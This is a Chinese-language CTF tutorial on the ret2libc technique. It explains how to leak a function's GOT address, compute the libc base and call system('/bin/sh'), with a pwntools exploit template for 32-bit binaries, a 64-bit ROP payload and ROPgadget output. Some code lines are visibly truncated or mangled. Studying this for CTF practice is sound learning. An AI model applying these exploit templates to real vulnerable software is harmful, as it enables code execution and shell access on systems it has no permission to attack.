PWN题型之Ret2Libc
⽂章⽬录
前⾔
菜鸡总结,如有不对,请不吝赐教。
0x1 :使⽤前提条件
存在溢出条件,题⽬没有system等后门函数,并且开启了NX保护
NX即No-eXecute(不可执⾏)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执⾏,当程序溢出成功转⼊shellcode 时,程序会尝试在数据页⾯上执⾏指令,此时CPU就会抛出异常,⽽不是去执⾏恶意指令。这样就会导致你直接构造的shellcode没有⽤。
0x2 :解题思路
offset指令是什么意思⾸先要明⽩我们的⽬的是到system函数以及binsh参数的地址。
那怎么到system(/bin/sh)的地址呢?
⾸先我们要知道⼀个公式 :函数的真正地址 = 基地址 + 偏移地址
偏移地址:这就是与libc有关的原因,libc是Linux系统下的c函数库,既然是函数库就会存在system函数,binsh参数,libc⾥⾯存放的是函数的偏移地址。但是libc.so版本有很多,版本不同偏移量就不同,只要确定了libc版本就能偏移地址。
综上的分析结果是:泄露某个函数的真正地址,然后利⽤最后三位来确定libc版本,然后⽤来查system函数与该函数的偏移地址。利⽤公式基地址 = 函数的真正地址- 偏移量 来确定基地址。然后利⽤公式来确定system函数真正地址。
那怎样获得其他函数的真正地址?
我们知道puts函数,write函数等可以打印内容,这样的话我们可以直接利⽤他们打印出他们的真正地址(注意这个函数必须已经出现过了)。
我们可以使⽤Linux延迟绑定机制。这个只需知道在libc中存在got表和plt表,plt存放的是进⼊这个函数的地址,⽽got表中存放的是这个函数的真正地址。
我们可以利⽤puts函数,write函数等函数打印它⾃⼰的真正的地址,然后到libc版本,基地址,然后到system函数地址
0x3 :32位程序libc题型模板
如果以上的讲解不懂,没关系,只要你会写就⾏,因为libc题型⼤体是有⼀个模板的,你记住了就⾏。
from pwn import *
r =process("./pwn")
#r = remote()
libc =ELF("./libc____")
e =ELF("./pwn")
write_plt_addr = e.plt["write"]
write_got_addr = e.got["write"]
main_addr = e.symbols["main"]
offset =
payload = offset*'a'+p32(write_plt_addr)+p32(main_addr)+p32(1)+p32(write_got_addr)+p32(4)
#r.recvuntil()
r.sendline(payload)
write_addr =v(4))
print(hex(write_addr))
write_offset = libc.symbols["write"]
system_offset = libc.symbols["system"]
binsh_offset = libc.search("/bin/sh").next()
base_addr = write_addr - write_offset
system_addr = base_addr + system_offset
binsh_addr = base_addr + binsh_offset
payload = offset*'a'+p32(system_addr)+p32(1)+p32(binsh_addr)
#r.recvuntil()
r.sendline(payload)
r.interactive()
0x4 :代码的解析
e = ELF("./pwn")
调⽤题⽬pwn的elf⽂件
context(log_level = ‘debug’)
这是debug调试代码,做这种题很难⼀步就做对,加上这个⽅便你调试查看问题
write_plt_addr = e.plt[“write”]
write_got_addr = e.got[“write”]
main_addr = e.symbols[“main”]
调⽤程序的的elf⽂件,然后这个是打印出其中write函数的plt表和got表的地址,以及打印main函数的地址(打印函数⽤symbols)payload:
offset = 0x88 + 4
payload = offset*‘a’ + p32(write_plt_addr) + p32(main_addr) + p32(1) + p32(write_got_addr) + p32(4)
构造payload,先是填充字节,然后到达返回地址。利⽤rop技术。
32位程序:先是write函数的地址 + 预留返回地址 + write函数的三个参数 (1 + write函数的真正地址(got表内的地址) + 打印的字节)
注意:这⾥的预留返回地址很重要,它的⽬的是要再循环⼀此,所以该地址必须在溢出点之前,可以是main函数起点
⽬的:利⽤write函数打印的功能,泄露write函数的真正地址(got表中的,当然你也可以泄露其他在main函数⾥⾯已经运⾏过的函数)。
r.sendline(payload)
write_addr = v(4))
print(hex(write_addr))
第⼀⾏的意思是在"input:\n"以后发送payload,然后u32是32位解包,r.recv接收字节4位。最后print打印write函数的地址,hex是以⼗六进制的形式
打印出write函数的地址以后,怎么到函数的偏移量呢?
write_offset = 0x000DD460
system_offset = 0x040310
binsh_offset = 0x162D4C
(2)利⽤LibcSearch模块⾃动的获取libc版本,然后直接就可以打印出来偏移量了,不过有些libc版本不到,并且如果题⽬给出了libc版本,像buuctf⾥⾯的给出了libc版本就⽆需⽤这个⽅法了。
from LibcSearcher import
libc=LibcSearcher(‘read’,read_addr) #read为你要泄露的地址
read_offset = libc.dump(‘read’)
system_offset = libc.dump(‘system’)
binsh_offset = libc.dump(‘str_bin_sh’)
(3)如果题⽬直接给出了⽂件的libc版本,就⽆需⾃⼰写出具体的偏移量了
libc = ELF("./libc-2.27.so")
system_offset = libc.symbols[‘system’]
binsh_offset = libc.search(’/bin/sh’).next()
write_offset = libc.symbols[‘write’]
到偏移量以后,接下来就是利⽤公式函数的真正地址 = 函数偏移地址 + 基地址。来获得基地址,以此来获得system函数的真正地址
write_offset = 0x000DD460
system_offset = 0x040310
binsh_offset = 0x162D4C
base_addr = write_addr - write_offset
system_addr = base_addr + system_offset
binsh_addr = base_addr + binsh_offset
到system函数和binsh参数地址以后,就和以前的溢出⼀样了,并且之前发送的payload是回到了main函数,即重新开始运⾏程序
0x5 :64位程序实例
上⾯的讲解是32位程序的,下⾯以64位程序的题为例进⾏讲解。
注意:32位程序和64位程序会存在不同。且与32位程序相⽐,64位程序相⽐更加复杂。
程序分析 :64位程序,只开启了NX保护 。然后打开IDA,查看⼀下程序源代码
代码分析:很明显read函数存在溢出。 然后查字符串没有发现后门地址,开启了NX保护,利⽤libc泄露system函数地址
64位与32位程序不同①:64位是先传参,⽽32是栈⾥⾯传参是后传参。64位程序的参数从左到右依次放⼊寄存器: rdi, rsi, rdx, rcx, r8, r9中。
payload:
payload = offset*‘a’ + p64(rdi_addr) + p64(1) + p64(rsi_r15_addr) + p64(write_got_addr) + p64(0) +
p64(write_plt_addr) + p64(main_addr)
含义:偏移量 + rdi寄存器 + 第⼀个参数 + rsi寄存器 + 第⼆个参数 + rdx寄存器 + 第三个参数 + write函数的地址 + 预留返回地址
在传参时先需要确定这个参数的位置命令为:
ROPgadget --binary ./pwn --only “pop|ret”
muggle@muggle-virtual-machine:~/CTF-Pwn/jieti-pwn$ ROPgadget --binary ./pwn --only “pop|ret”
Gadgets information
============================================================
0x00000000004006ac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006ae : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop r14 ; pop r15 ; ret
0x00000000004006b2 : pop r15 ; ret
0x00000000004006ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006af : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400550 : pop rbp ; ret
0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret
0x00000000004006ad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400499 : ret
Unique gadgets found: 11
注意:
(1)由于该程序,没有rdx寄存器,⽽write函数的第三个参数为输出的字节数,⽽⽆论你输出多少,我只要取前⾯⼏个就⾏了,所以rdx 从寄存器没有也没事。同时在这道题当中rsi后后⾯还有⼀个r15,所以⽆论你输⼊什么都可以,这就是加上那个p64(0)的原因。
(2)如果是puts函数的话,就只有⼀个参数,只要⼀个寄存器rdi就会更加简单。
不同之处②,64位需要字节数对齐,所以有时候你需要加⼊⼀个ret_addr 地地址,⾄于具体是什么时候
加我还是没搞懂。
由于本题存在libc版本,直接可以⽤前⾯提到的第三种⽅法来求偏移量。
完整的exp :
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论